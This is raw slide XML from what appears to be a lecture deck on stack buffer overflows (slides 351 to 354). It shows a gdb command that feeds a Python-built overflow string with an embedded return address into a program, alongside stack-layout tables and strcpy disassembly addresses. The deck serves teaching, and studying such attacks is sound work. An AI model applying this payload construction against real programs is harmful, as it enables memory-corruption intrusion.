          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>351</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82088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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edcb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas"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352</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128031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801168059"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff656</a:t>
                      </a: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353</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322571388"/>
              </p:ext>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0xbffff656</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0xbffff64c</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0xbffff688</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e61</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755547" y="333048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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1026899"/>
            <a:ext cx="2831284" cy="373308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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920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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff656</a:t>
                      </a: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354</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="588177783"/>
              </p:ext>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0xa</a:t>
                      </a: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0xbffff64c</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0xbffff688</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e66</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
